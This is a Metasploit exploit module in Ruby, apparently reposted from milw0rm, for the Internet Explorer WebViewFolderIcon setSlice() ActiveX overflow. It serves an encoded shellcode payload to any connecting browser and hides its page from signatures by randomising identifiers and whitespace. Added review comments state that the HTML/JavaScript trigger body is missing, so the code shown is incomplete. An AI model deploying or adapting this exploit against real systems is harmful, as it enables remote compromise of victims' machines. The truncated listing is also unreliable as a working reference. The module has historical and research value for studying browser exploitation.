
MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit

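##
# This module is part of the Metasploit Framework 3.
# svn co http://metasploit.com/svn/framework3/trunk/
##

require 'msf/core'

module Msf

# Browser-side exploit for the setSlice() method of the WebViewFolderIcon
# ActiveX control (Month of Browser Bugs #18). The module serves one HTML
# document from the framework's HTTP server; the Internet Explorer instance
# that fetches it is the victim.
#
# NOTE(review): the HTML/JavaScript body of the served document -- the text
# between the %Q| | delimiters in on_request_uri -- is missing from the
# listing this was recovered from (the forum rendering stripped the markup;
# the quote characters were also mangled and have been repaired here). As
# written the page holds only a random alphabetic string, so the module as
# shown cannot reach the vulnerable control. Restore the document body from
# the referenced revision ($Revision: 3783 $) before relying on it.
class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote

  include Exploit::Remote::HttpServer::Html

  # Module metadata: name, description, references, payload constraints and
  # the single supported target.
  #
  # 'Ret' (0x0c0c0c0c) is not an address inside a loaded module; presumably
  # the (stripped) page body arranges memory so the payload sits there --
  # confirm against the restored document before changing it.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
      'Description'    => %q{
        This module exploits a flaw in the WebViewFolderIcon ActiveX control
        included with Windows 2000, Windows XP, and Windows 2003. This flaw
        was published during the Month of Browser Bugs project (MoBB #18).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm',
        ],
      'Version'        => '$Revision: 3783 $',
      'References'     =>
        [
          [ 'OSVDB', '27110' ],
          [ 'BID', '19030' ],
          [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
        ],
      'Payload'        =>
        {
          # 1024 bytes of payload space. NUL is the only bad character
          # because the shellcode is delivered through a JavaScript
          # unescape()-style string (see on_request_uri).
          'Space'    => 1024,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
        ],
      'DefaultTarget'  => 0))
  end

  # Opt this module out of the framework's automatic filtering. What the
  # framework does with the flag is not visible here -- the method simply
  # returns false.
  def autofilter
    false
  end

  # Handle an HTTP request from a client: regenerate the payload, build a
  # randomized exploit document and send it back as the response.
  #
  # cli     - the client connection; used for payload regeneration, for the
  #           status message and as the destination of the response
  # request - the HTTP request; not inspected beyond triggering the handler
  #
  # Returns nothing useful; sends the document to the client as a side
  # effect, or returns early without a response if the payload could not
  # be regenerated.
  def on_request_uri(cli, request)
    # Re-generate the payload for this client; nil means failure.
    return unless regenerate_payload(cli)

    # Shellcode as a JavaScript unescape()-style string in the target's
    # byte order. Contains no whitespace, so the randomization below is
    # safe on it.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Hex digits of the return address's first two bytes in pack('V')
    # (little-endian) order -- "0c0c" for the single target. Intended for
    # the stripped page body; unused as this listing stands.
    addr_word = [target.ret].pack('V').unpack('H*')[0][0, 4]

    # Random JavaScript variable names so the served page has no fixed
    # signature. They are referenced only by the missing page body.
    var_buffer    = random_identifier
    var_shellcode = random_identifier
    var_unescape  = random_identifier
    var_x         = random_identifier
    var_i         = random_identifier
    var_tic       = random_identifier
    var_toc       = random_identifier

    # Random filler text for the HTML body.
    html = random_identifier

    # Build the document. NOTE(review): the HTML/JavaScript that should
    # surround #{html} was stripped from this listing -- see the class
    # comment.
    content = %Q|
#{html}
|

    # Randomize the document's whitespace as a further anti-signature step.
    content = randomize_whitespace(content)

    print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client.
    send_response(cli, content)
  end

  private

  # A random alphabetic identifier of 2..31 characters.
  def random_identifier
    Rex::Text.rand_text_alpha(rand(30) + 2)
  end

  # Return a copy of doc in which every run of whitespace is replaced by a
  # random mix of 2..101 tabs, spaces, CRs and LFs.
  #
  # This rewrites every whitespace run in the whole document, including any
  # inside JavaScript or HTML string literals, and may insert CR/LF there --
  # so string literals in the served page must not contain whitespace.
  def randomize_whitespace(doc)
    set = "\x09\x20\x0d\x0a"
    doc.gsub(/\s+/) do
      len = rand(100) + 2
      buf = ''
      buf << set[rand(set.length), 1] while buf.length < len
      buf
    end
  end

end
end

# milw0rm.com [2006-09-27]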
